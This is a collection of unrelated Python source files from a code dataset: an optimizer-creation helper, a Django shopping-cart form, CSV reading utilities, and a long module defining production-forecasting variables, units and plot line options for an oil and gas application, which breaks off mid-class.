# from elit.optimization.adamw.optimizers_v2 import AdamW
# from elit.optimization.adamw.utils import get_weight_decays
# def create_optimizer(model, init_lr, num_train_steps, num_warmup_steps):
# """Creates an optimizer with learning rate schedule."""
# wd_dict = get_weight_decays(model)
#
# # Implements linear decay of the learning rate.
# learning_rate_fn = tf.keras.optimizers.schedules.PolynomialDecay(
# initial_learning_rate=init_lr,
# decay_steps=num_train_steps,
# end_learning_rate=0.0)
# if num_warmup_steps:
# learning_rate_fn = WarmUp(initial_learning_rate=init_lr,
# decay_schedule_fn=learning_rate_fn,
# warmup_steps=num_warmup_steps)
# optimizer = AdamW(
# learning_rate=learning_rate_fn,
# weight_decay_rate=0.01,
# beta_1=0.9,
# beta_2=0.999,
# epsilon=1e-6,
# exclude_from_weight_decay=['layer_norm', 'bias'])
# return optimizer
def create_optimizer(init_lr, num_train_steps, num_warmup_steps, weight_decay_rate=0.01, epsilon=1e-6, clipnorm=None):
"""Creates an optimizer with learning rate schedule.
Args:
init_lr:
num_train_steps:
num_warmup_steps:
weight_decay_rate: (Default value = 0.01)
epsilon: (Default value = 1e-6)
clipnorm: (Default value = None)
Returns:
"""
# Implements linear decay of the learning rate.
learning_rate_fn = tf.keras.optimizers.schedules.PolynomialDecay(
initial_learning_rate=init_lr,
decay_steps=num_train_steps,
end_learning_rate=0.0)
if num_warmup_steps:
learning_rate_fn = WarmUp(initial_learning_rate=init_lr,
decay_schedule_fn=learning_rate_fn,
warmup_steps=num_warmup_steps)
additional_args = {}
if clipnorm:
additional_args['clipnorm'] = clipnorm
optimizer = AdamWeightDecay(
learning_rate=learning_rate_fn,
weight_decay_rate=weight_decay_rate,
beta_1=0.9,
beta_2=0.999,
epsilon=epsilon,
exclude_from_weight_decay=['LayerNorm', 'bias'],
**additional_args
)
# {'LayerNorm/gamma:0', 'LayerNorm/beta:0'}
return optimizer
| 2.3125 | 2 |
angalabiri/shop/forms/cartform.py | dark-codr/ebiangala | 1 | 12765096 | from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import (
Column,
HTML,
Field,
Fieldset,
Layout,
Row,
Submit,
BaseInput,
)
from crispy_forms.bootstrap import InlineField, UneditableField
from crispy_forms import layout
PRODUCT_QUANTITY_CHOICES = [(i, str(i)) for i in range(1, 200)]
class CartAddProductForm(forms.Form):
quantity = forms.TypedChoiceField(
choices=PRODUCT_QUANTITY_CHOICES,
coerce=int,
required=False,
widget=forms.TextInput(attrs={'class': 'qty', 'style':'width:60px; padding: 8.7px;'})
)
update = forms.BooleanField(
widget=forms.HiddenInput(), initial=False, required=False
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(
BaseInput("quantity", value=1, style="width:50px;", add_class="qty"),
Submit("Add To Cart", "Add to Cart", css_class="add-to-cart button m-0"),
)
# class ListCartAddProductForm(forms.Form):
# quantity = forms.TypedChoiceField(
# choices=PRODUCT_QUANTITY_CHOICES,
# coerce=int,
# required=False,
# widget=forms.TextInput(attrs={'class': 'qty', 'style':'width:60px; padding: 8.7px;'})
# )
# update = forms.BooleanField(
# widget=forms.HiddenInput(), initial=False, required=False
# )
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.helper = FormHelper()
# self.helper.layout = Layout(
# BaseInput("quantity", value=1, style="width:50px;", add_class="qty"),
# Submit("Add To Cart", "Add To Cart", css_class="add-to-cart button m-0"),
# )
# <i class="icon-shopping-cart"></i>
| 2.390625 | 2 |
yakutils/_csv.py | kdebowski/yakutils | 0 | 12765097 | """This module contains boilerplate csv helpers."""
import csv
def read_csv(filename):
"""Read a CSV file.
**Example**:
>>> read_csv('/path/to/data.csv')
[{ 'name': 'foo' }]
:param filename:
Path to CSV file.
:return:
A Python representation of the CSV document.
"""
with open(filename) as fh:
field_names = (
fh.readline().replace('"', "").replace("\n", "").split(",")
)
dict_reader = csv.DictReader(fh, fieldnames=field_names)
return list(dict(row) for row in dict_reader)
def iter_csv(filename):
"""Iterate a CSV file.
**Example**:
>>> for item in iter_csv('/path/to/data.csv'):
... print(item)
[{ 'name': 'foo' }]
:param filename:
Path to CSV file.
:yield:
A Python ``dict`` representation of a CSV row.
"""
with open(filename) as fh:
field_names = (
fh.readline().replace('"', "").replace("\n", "").split(",")
)
dict_reader = csv.DictReader(fh, fieldnames=field_names)
for row in dict_reader:
yield dict(row)
| 4 | 4 |
alveus/variable_mgr.py | FrederikLehn/alveus | 0 | 12765098 | from datetime import date
import numpy as np
from matplotlib.lines import Line2D
from _ids import *
import _icons as ico
from utilities import pydate2wxdate, wxdate2pydate, GetAttributes
from properties import SummaryProperty
class VariableManager:
def __init__(self, unit_system):
# simulation dependent -----------------------------------------------------------------------------------------
# times
self._time = Time()
self._date = Date()
# potentials
self._oil_potential = OilPotential(unit_system)
self._gas_potential = GasPotential(unit_system)
self._water_potential = WaterPotential(unit_system)
self._liquid_potential = LiquidPotential(unit_system)
self._lift_gas_potential = LiftGasPotential(unit_system)
self._gas_injection_potential = GasInjectionPotential(unit_system)
self._water_injection_potential = WaterInjectionPotential(unit_system)
self._total_gas_potential = TotalGasPotential(unit_system)
# rates
self._oil_rate = OilRate(unit_system)
self._gas_rate = GasRate(unit_system)
self._water_rate = WaterRate(unit_system)
self._liquid_rate = LiquidRate(unit_system)
self._lift_gas_rate = LiftGasRate(unit_system)
self._gas_injection_rate = GasInjectionRate(unit_system)
self._water_injection_rate = WaterInjectionRate(unit_system)
self._total_gas_rate = TotalGasRate(unit_system)
# cumulatives
self._oil_cumulative = OilCumulative(unit_system)
self._gas_cumulative = GasCumulative(unit_system)
self._water_cumulative = WaterCumulative(unit_system)
self._liquid_cumulative = LiquidCumulative(unit_system)
self._lift_gas_cumulative = LiftGasCumulative(unit_system)
self._gas_injection_cumulative = GasInjectionCumulative(unit_system)
self._water_injection_cumulative = WaterInjectionCumulative(unit_system)
self._total_gas_cumulative = TotalGasCumulative(unit_system)
# ratios
self._water_cut = WaterCut(unit_system)
self._oil_cut = OilCut(unit_system)
self._gas_oil_ratio = GasOilRatio(unit_system)
self._water_oil_ratio = WaterOilRatio(unit_system)
self._gas_liquid_ratio = GasLiquidRatio(unit_system)
self._water_gas_ratio = WaterGasRatio(unit_system)
self._oil_gas_ratio = OilGasRatio(unit_system)
self._total_gas_liquid_ratio = TotalGasLiquidRatio(unit_system)
self._production_uptime = ProductionUptime(unit_system)
self._lift_gas_uptime = LiftGasUptime(unit_system)
self._gas_injection_uptime = GasInjectionUptime(unit_system)
self._water_injection_uptime = WaterInjectionUptime(unit_system)
# user-defined summary variables
self._summaries = {}
# non-simulation dependent -------------------------------------------------------------------------------------
# wells
self._well_spacing = WellSpacing(unit_system)
# reservoir fluids
self._bo = OilFVF(unit_system)
self._bg = GasFVF(unit_system)
self._bw = WaterFVF(unit_system)
self._rs = SolutionGasOilRatio(unit_system)
# injection fluids
self._bg_inj = InjectionGasFVF(unit_system)
self._bw_inj = InjectionWaterFVF(unit_system)
# facilities
self._availability = Availability(unit_system)
self._tglr = TargetGasLiquidRatio(unit_system)
self._wag_cycle = WAGCycleDuration(unit_system)
self._wag_cycles = WAGCycles(unit_system)
self._voidage_ratio = TargetVoidageRatio(unit_system)
# constraints
self._oil_constraint = OilConstraint(unit_system)
self._gas_constraint = GasConstraint(unit_system)
self._water_constraint = WaterConstraint(unit_system)
self._liquid_constraint = LiquidConstraint(unit_system)
self._gas_inj_constraint = InjectionGasConstraint(unit_system)
self._water_inj_constraint = InjectionWaterConstraint(unit_system)
self._gas_lift_constraint = LiftGasConstraint(unit_system)
# volumes
self._stoiip = STOIIP(unit_system)
# risking
self._maturity = Maturity(unit_system)
self._pos = ProbabilityOfSuccess(unit_system)
# scalers
self._s_cum = CumulativeScaler(unit_system)
self._s_rate = RateScaler(unit_system)
self._s_ffw = FFWScaler(unit_system)
self._s_ffg = FFGScaler(unit_system)
self._onset = OnsetScaler(unit_system)
self._wct_ini = InitialWCTScaler(unit_system)
# statics TODO: Change to a dictionary and let user fill with only useful parameters
self._length = CompletedLength(unit_system)
self._hcft = HydrocarbonFeet(unit_system)
self._hcpv = HydrocarbonPoreVolume(unit_system)
self._permeability = Permeability(unit_system)
self._oil_density = OilDensity(unit_system)
# correlation matrix for the scalers and static parameters -----------------------------------------------------
self._correlation_labels = []
self._correlation_matrix = []
self.InitialiseCorrelationMatrix()
def AddCorrelation(self, variable):
if self._correlation_matrix:
for row in self._correlation_matrix:
row.append(0.)
self._correlation_matrix.append([0.] * (len(self._correlation_matrix) + 1))
self._correlation_matrix[-1][-1] = 1.
self._correlation_labels.append(variable.GetMenuLabel())
def AddSummary(self, summary):
id_ = self.GetUniqueSummaryId()
summary.SetId(id_)
self._summaries[id_] = summary
def DeleteSummary(self, id_):
del self._summaries[id_]
def Get(self, type_, id_=None):
if id_ is None:
return list(getattr(self, '_{}'.format(type_)).values())
else:
return getattr(self, '_{}'.format(type_))[id_]
def GetAllVariables(self):
return GetAttributes(self, exclude=('_correlation_labels', '_correlation_matrix'), sort=True)
def GetCorrelationMatrix(self):
return self._correlation_matrix, self._correlation_labels
def GetSummaries(self):
return self._summaries.values()
def GetVariable(self, id_):
attr = '_{}'.format(id_)
if hasattr(self, attr):
return getattr(self, attr)
else:
return self._summaries[id_]
def GetVariables(self, ids):
return [self.GetVariable(id_) for id_ in ids]
def GetUniqueSummaryId(self):
ids = self._summaries.keys()
if not ids:
return 0
else:
return max(ids) + 1
def InitialiseCorrelationMatrix(self):
attrs = GetAttributes(self, exclude=('_summaries', '_correlation_labels', '_correlation_matrix'), attr_only=True, sort=True)
for attr in attrs:
if attr.IsStatic() or attr.IsScaler():
self.AddCorrelation(attr)
def SetCorrelationMatrix(self, correlation_matrix):
self._correlation_matrix = correlation_matrix
# ======================================================================================================================
# Generic Variables
# ======================================================================================================================
class Variable:
def __init__(self):
self._unit = None # subclass of class Unit
self._frame_label = None # label shown on wx.Frames
self._menu_label = None # label shown in treectrls
self._image = None # PyEmbeddedImage shown in trees, etc.
self._choices = None # list of strings, which can be given as input to wx.Choice, etc.
self._choice_images = None # list of PyEmbeddedImage which can be passed to bitmapcombobox
self._client_data_map = None # dictionary of client_data for each index in bitmapcombobox
self._limits = (None, None) # limiting values for input and on plot axis'
# plot options
self._line_options = None # class of LineOptions
self._fitted_options = None # class of FittedDataOptions
self._legend = None # string, used for bar and bubble charts
# axis options (plotting)
self._plot_label = None # label shown in Matplotlib plots
self._is_date = False # required for plotting of dates
# to and from Frame options
self._round_off = None # round-off used for wx.Frame displays of variables (if pytype is float)
self._pytype = None # python-type
# tooltip
self._tooltip = None # str, tooltip to be displayed on hover
# variable management
self._type = None # str
self._id = None # str, allows access to variable_mgr via getattr(self, id_)
self._type_id = None # int, id to test against
self._image_key = None
def FromFrame(self, value):
if self._pytype is not str and value == '':
return None
elif self._pytype is bool:
return value
elif self._pytype is float:
return float(value)
elif self._pytype is int:
return int(value)
elif self._pytype is date:
return wxdate2pydate(value)
elif self._pytype is str:
return str(value)
elif (self._pytype is list) or (self._pytype is tuple):
if value == -1: # default selection in a combobox/choice
return None
else:
return value
elif self._pytype is Pointer:
return value
elif self._pytype is Index:
return value
elif self._pytype is wx.Colour:
return value
def GetAttribute(self):
return '_{}'.format(self._type)
def GetBitmap(self):
if self._image is not None:
return self._image.GetBitmap()
else:
return wx.NullBitmap
def GetImage(self):
return self._image
def GetChoices(self, idx=None):
if idx is None:
return [choice if choice is not None else '' for choice in self._choices]
else:
return self._choices[idx]
def GetChoiceBitmaps(self):
return [image.GetBitmap() if (image is not None) else wx.NullBitmap for image in self._choice_images]
def GetClientDataMap(self):
return self._client_data_map
def GetComboLabel(self):
return self._frame_label
def GetFittedOptions(self):
return self._fitted_options
def GetFrameLabel(self, idx=None):
if isinstance(self._frame_label, tuple) and idx is None:
return ('{}:'.format(l) for l in self._frame_label)
if idx is None:
if self._frame_label is None:
return None
label = self._frame_label
else:
if self._frame_label[idx] is None:
return None
label = self._frame_label[idx]
return '{}:'.format(label)
def GetId(self):
return self._id
def GetImageKey(self):
return self._image_key
def GetLabel(self):
return self._frame_label
def GetLegend(self):
return self._legend
def GetLimits(self):
return self._limits
def GetLineOptions(self):
return self._line_options
def GetMenuLabel(self):
return self._menu_label
def GetPlotLabel(self):
return self._line_options.GetLabel()
def GetToolTip(self):
return self._tooltip
def GetType(self):
return self._type
def GetTypeId(self):
return self._type_id
def GetUnit(self, idx=None):
if idx is None:
unit = self._unit
else:
unit = self._unit[idx]
if unit is None or isinstance(unit, str) or isinstance(unit, tuple):
return unit
else:
return unit.Get()
def GetUnitClass(self):
return self._unit
def GetXLabel(self):
unit = self._unit.Get()
if unit:
if ('^' in unit) or ('_' in unit):
return r'{} [${}$]'.format(self._plot_label, unit)
else:
return r'{} [{}]'.format(self._plot_label, unit)
else:
return r'{}'.format(self._plot_label)
def GetYLabel(self, group_units=False):
if group_units:
label = self._unit.GetLabel()
else:
label = self._plot_label
unit = self._unit.Get()
if ('^' in unit) or ('_' in unit):
unit_label = r'[${}$]'.format(unit)
elif unit == '':
unit_label = r'[-]'
else:
unit_label = r'[{}]'.format(unit)
return r'{} {}'.format(label, unit_label)
def IsDate(self):
return self._is_date
def IsScaler(self):
return self.IsType('scalers')
def IsStatic(self):
return self.IsType('statics')
def IsSummary(self):
return self.IsType('summaries')
def IsType(self, type_):
return self._type == type_
def SetBitmap(self, bitmap):
self._bitmap = bitmap
def SetImage(self, image_key=None):
self._image_key = self._id
def SetUnit(self, unit_system):
pass
def SetUnitClass(self, unit_class):
self._unit = unit_class
def ToFrame(self, value):
if ((self._pytype is float) or (self._pytype is int)) and value is None:
return ''
elif self._pytype is bool:
return value
elif self._pytype is float:
return str(round(value, self._round_off))
elif self._pytype is int:
return str(value)
elif self._pytype is date:
if value is None: # occurs on first load
return wx.DateTime.Now()
else:
return pydate2wxdate(value)
elif self._pytype is str:
if value is None:
return ''
else:
return str(value)
elif (self._pytype is list) or (self._pytype is tuple):
if value is None: # default selection in a combobox/choice
return -1
else:
return value
elif self._pytype is Pointer:
return value
elif self._pytype is Index:
if value is None: # default selection in a RadioBoxes
return 0
else:
return value
elif self._pytype is wx.Colour:
return value
class VariableCollection:
def __init__(self, *variables):
self._variables = []
self.AddVariables(*variables)
def AddVariable(self, variable):
self._variables.append(variable)
def AddVariables(self, *variables):
for variable in variables:
self.AddVariable(variable)
def GetChoiceBitmaps(self):
return [v.GetBitmap() for v in self._variables]
def GetChoices(self):
return [v.GetComboLabel() for v in self._variables]
def GetFrameLabel(self, idx=None):
if idx is None:
return [v.GetFrameLabel() for v in self._variables]
else:
return self._variables[idx].GetFrameLabel()
def GetUnit(self, idx=None):
if idx is None:
return [v.GetUnit() for v in self._variables]
else:
return self._variables[idx].GetUnit()
def GetVariables(self):
return self._variables
class Summary(Variable):
def __init__(self):
super().__init__()
self._image_key = None
self._properties = SummaryProperty() # similar to what Entities have
self._type = 'summaries'
self._type_id = ID_SUMMARY
def Calculate(self, profile, *args):
return self._properties.Calculate(profile, *args)
def GetImageKey(self):
return self._image_key
def GetProperties(self):
return self._properties
def ReplaceInformation(self, variable, image):
self._image = image
self._unit = variable.GetUnitClass()
self._properties = variable.GetProperties()
self._menu_label = variable.GetMenuLabel()
self._plot_label = variable.GetMenuLabel()
self._legend = variable.GetMenuLabel()
def SetId(self, id_):
self._id = id_
def SetImage(self, image_key=None):
self._image_key = image_key
self._image = image_key
def SetLabels(self, label):
self._menu_label = label
self._plot_label = label
self._legend = label
# ======================================================================================================================
# Types used to test against in ToFrame and FromFrame
# ======================================================================================================================
class Pointer:
"""
Used for controls that allow insert via an arrow or other means
"""
def __init__(self):
pass
class Index:
"""
Used for transfer to and from RadioBox (which requires 0 as default, unlike bitmapcombobox which requires -1)
"""
def __init__(self):
pass
# ======================================================================================================================
# Plotting options for plotable variables
# ======================================================================================================================
class LineOptions:
def __init__(self, alpha=None, colour=None, drawstyle='default', fillstyle=None, label=None, linestyle='-',
linewidth=None, marker=None, markersize=None):
self._alpha = alpha # double, [0, 1]
self._colour = colour # (R, G, B) normalized to [0, 1]
self._drawstyle = drawstyle # 'default', 'steps-{pre, mid, post}'
self._fillstyle = fillstyle # 'full', 'none' (additional options available)
self._label = label # string
self._linestyle = linestyle # '-', '--', '-.', ':'
self._linewidth = linewidth # int, primarily set through settings
self._marker = marker # see matplotlib documentation
self._markersize = markersize # int, primarily set through settings
self._picker = 7 # sensitivity to click-events
def Get(self):
# returns all options as **kwargs input to a matplotlib axes.plot function
return {'alpha': self._alpha,
'color': self._colour,
'drawstyle': self._drawstyle,
'fillstyle': self._fillstyle,
'label': self._label,
'linestyle': self._linestyle,
'linewidth': self._linewidth,
'marker': self._marker,
'markersize': self._markersize,
'picker': self._picker}
def GetAlpha(self):
return self._alpha
def GetColour(self):
return self._colour
def GetDrawstyle(self):
"""
Used for transfer to frame
:return:
"""
if self._drawstyle is None:
return -1
elif self._drawstyle == 'default':
return 0
elif self._drawstyle == 'steps-pre':
return 1
elif self._drawstyle == 'steps-mid':
return 2
elif self._drawstyle == 'steps-post':
return 3
def GetLabel(self):
return self._label
def GetLegend(self):
return Line2D([], [], **self.Get())
def GetLinestyle(self):
"""
Used for transfer to frame
:return:
"""
if self._linestyle is None:
return -1
elif self._linestyle == '-':
return 0
elif self._linestyle == '--':
return 1
elif self._linestyle == '-.':
return 2
elif self._linestyle == ':':
return 3
def SetAlpha(self, alpha):
self._alpha = alpha
def SetColour(self, colour):
self._colour = colour
def SetDrawstyle(self, drawstyle):
"""
Used for transfer from frame
:param drawstyle: int, BitmapComboBox index
:return:
"""
if drawstyle == -1:
self._drawstyle = None
elif drawstyle == 0:
self._drawstyle = 'default'
elif drawstyle == 1:
self._drawstyle = 'steps-pre'
elif drawstyle == 2:
self._drawstyle = 'steps-mid'
elif drawstyle == 3:
self._drawstyle = 'steps-post'
def SetFillstyle(self, fillstyle):
self._fillstyle = fillstyle
def SetLabel(self, label):
self._label = label
def SetLinestyle(self, linestyle):
"""
Used for transfer from frame
:param drawstyle: int, BitmapComboBox index
:return:
"""
if linestyle == -1:
self._linestyle = None
elif linestyle == 0:
self._linestyle = '-'
elif linestyle == 1:
self._linestyle = '--'
elif linestyle == 2:
self._linestyle = '-.'
elif linestyle == 3:
self._linestyle = ':'
def SetLinewidth(self, linewidth):
self._linewidth = linewidth
def SetMarker(self, marker):
self._marker = marker
def SetMarkerSize(self, markersize):
self._markersize = markersize
def Highlight(self):
if self._markersize > 0:
self._markersize += 2
else:
self._linewidth += 2
def UnHighlight(self):
if self._markersize > 0:
self._markersize -= 2
else:
self._linewidth -= 2
class FittedDataOptions(LineOptions):
def __init__(self, colour=None):
super().__init__()
self._colour = colour
self._label = 'Fitted data'
self._fillstyle = 'none'
self._linewidth = 0.
self._marker = 'o'
# ======================================================================================================================
# Units
# ======================================================================================================================
class Unit:
def __init__(self, unit_system=None):
self._unit = None
self._label = None # used as label in plotting when units are grouped
def Get(self):
return self._unit
def GetLabel(self):
return self._label
def Set(self, unit_system):
# sub-class
pass
class TimeUnit(Unit):
def __init__(self, unit='days', unit_system=None):
super().__init__()
self._unit = unit
class DateUnit(Unit):
def __init__(self, unit_system=None):
super().__init__()
self._unit = '-'
class LiquidFlowRateUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Liquid Flow Rate'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'Mstb/day'
else: # metric
self._unit = 'm^{3}/day'
class GasFlowRateUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Gas Flow Rate'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'MMscf/day'
else: # metric
self._unit = 'm^{3}/day'
class LiquidVolumeUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Liquid Volume'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'MMstb'
else: # metric
self._unit = 'km^{3}'
class GasVolumeUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Gas Volume'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'Bscf'
else: # metric
self._unit = 'km^{3}'
class GasLiquidRatioUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Gas-Liquid Ratio'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'Mscf/stb'
else: # metric
self._unit = 'sm^{3}/sm^{3}'
class LiquidGasRatioUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Liquid-Gas Ratio'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'stb/Mscf'
else: # metric
self._unit = 'sm^{3}/sm^{3}'
class LiquidLiquidRatioUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Liquid-Liquid Ratio'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'stb/stb'
else: # metric
self._unit = 'sm^{3}/sm^{3}'
class LiquidVolumeRatio(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Liquid Volume Ratio'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'rb/stb'
else: # metric
self._unit = 'rm^{3}/sm^{3}'
class GasVolumeRatio(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Gas Volume Ratio'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'rb/Mscf'
else: # metric
self._unit = 'rm^{3}/sm^{3}'
class ReservoirVolumeRatio(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Reservoir Volume Ratio'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'rb/rb'
else: # metric
self._unit = 'rm^{3}/rm^{3}'
class LengthUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Length'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'ft'
else: # metric
self._unit = 'm'
class AreaUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Area'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'ft^{2}'
else: # metric
self._unit = 'm^{2}'
class VolumeUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Volume'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'stb'
else: # metric
self._unit = 'm^{3}'
class PermeabilityUnit(Unit):
def __init__(self, unit_system=None):
super().__init__()
self._label = 'Permeability'
self._unit = 'mD'
class DensityUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Density'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = '^{o}API'
else: # metric
self._unit = 'kg/m^{3}'
class FractionUnit(Unit):
def __init__(self, unit_system=None):
super().__init__()
self._label = 'Fraction'
self._unit = '-'
class PercentageUnit(Unit):
def __init__(self, unit_system=None):
super().__init__()
self._label = 'Percentage'
self._unit = '%'
class AmountUnit(Unit):
def __init__(self, unit_system=None):
super().__init__()
self._label = 'Amount'
self._unit = ''
class Unitless(Unit):
def __init__(self, unit_system=None):
super().__init__()
self._label = 'Dimensionless'
self._unit = ''
# ======================================================================================================================
# Time Variables
# ======================================================================================================================
class DurationVariable(Variable):
def __init__(self):
super().__init__()
self._type = 'durations'
class Time(DurationVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = TimeUnit()
self._menu_label = 'Time'
self._plot_label = 'Time'
self._image = ico.time_16x16
self._limits = (0., None)
self._id = 'time'
class Date(DurationVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = DateUnit()
self._menu_label = 'Date'
self._plot_label = 'Dates'
self._image = ico.dates_16x16
self._limits = (None, None)
self._is_date = True
self._id = 'date'
# ======================================================================================================================
# Production Potential Variables
# ======================================================================================================================
class PotentialVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._type = 'potentials'
self._type_id = ID_POTENTIAL
class OilPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Oil production potential'
self._image = ico.oil_rate_16x16
self._line_options = LineOptions(label=r'Oil Pot.', colour=np.array([0., 176., 80.]) / 255., linestyle='--')
self._plot_label = r'Oil Production Potential'
self._id = 'oil_potential'
class GasPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Gas production potential'
self._image = ico.gas_rate_16x16
self._line_options = LineOptions(label=r'Gas Pot.', colour=np.array([255., 0., 0.]) / 255., linestyle='--')
self._plot_label = r'Gas Production Potential'
self._id = 'gas_potential'
class WaterPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Water production potential'
self._image = ico.water_rate_16x16
self._line_options = LineOptions(label=r'Water Pot.', colour=np.array([91., 155., 213.]) / 255., linestyle='--')
self._plot_label = r'Water Production Potential'
self._id = 'water_potential'
class LiquidPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Liquid production potential'
self._image = ico.liquid_rate_16x16
self._line_options = LineOptions(label=r'Liquid Pot.', colour=np.array([51., 102., 153.]) / 255., linestyle='--')
self._fitted_options = FittedDataOptions(colour=np.array([255., 0., 0.]) / 255.)
self._plot_label = r'Liquid Production Potential'
self._id = 'liquid_potential'
class LiftGasPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Lift gas injection potential'
self._image = ico.lift_gas_rate_16x16
self._line_options = LineOptions(label=r'Lift Gas Pot.', colour=np.array([219., 34., 211.]) / 255., linestyle='--')
self._plot_label = r'Lift Gas Injection Potential'
self._id = 'lift_gas_potential'
class GasInjectionPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Gas injection potential'
self._image = ico.gas_injection_rate_16x16
self._line_options = LineOptions(label=r'Gas Inj. Pot.', colour=np.array([255., 0., 0.]) / 255., linestyle='--')
self._plot_label = r'Gas Injection Potential'
self._id = 'gas_injection_potential'
class WaterInjectionPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Water injection potential'
self._image = ico.water_injection_rate_16x16
self._line_options = LineOptions(label=r'Water Inj. Pot.', colour=np.array([91., 155., 213.]) / 255., linestyle='--')
self._plot_label = r'Water Injection Potential'
self._id = 'water_injection_potential'
class TotalGasPotential(PotentialVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Total gas production potential'
self._image = ico.total_gas_rate_16x16
self._line_options = LineOptions(label=r'Total Gas Pot.', colour=np.array([218., 119., 6.]) / 255., linestyle='--')
self._plot_label = r'Total Gas Production Potential'
self._id = 'total_gas_potential'
# ======================================================================================================================
# Production Rate Variables
# ======================================================================================================================
class RateVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._type = 'rates'
self._type_id = ID_RATE
class OilRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Oil production rate'
self._image = ico.oil_rate_16x16
self._line_options = LineOptions(label=r'Oil Rate', colour=np.array([0., 176., 80.]) / 255.)
self._plot_label = r'Oil Production Rate'
self._id = 'oil_rate'
class GasRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Gas production rate'
self._image = ico.gas_rate_16x16
self._line_options = LineOptions(label=r'Gas Rate', colour=np.array([255., 0., 0.]) / 255.)
self._plot_label = r'Gas Production Rate'
self._id = 'gas_rate'
class WaterRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Water production rate'
self._image = ico.water_rate_16x16
self._line_options = LineOptions(label=r'Water Rate', colour=np.array([91., 155., 213.]) / 255.)
self._plot_label = r'Water Production Rate'
self._id = 'water_rate'
class LiquidRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Liquid production rate'
self._image = ico.liquid_rate_16x16
self._line_options = LineOptions(label=r'Liquid Rate', colour=np.array([51., 102., 153.]) / 255.)
self._plot_label = r'Liquid Production Rate'
self._id = 'liquid_rate'
class LiftGasRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Lift gas injection rate'
self._image = ico.lift_gas_rate_16x16
self._line_options = LineOptions(label=r'Lift Gas Rate', colour=np.array([219., 34., 211.]) / 255.)
self._plot_label = r'Lift Gas Injection Rate'
self._id = 'lift_gas_rate'
class GasInjectionRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Gas injection rate'
self._image = ico.gas_injection_rate_16x16
self._line_options = LineOptions(label=r'Gas Inj. Rate', colour=np.array([255., 0., 0.]) / 255.)
self._plot_label = r'Gas Injection Rate'
self._id = 'gas_injection_rate'
class WaterInjectionRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._menu_label = 'Water injection rate'
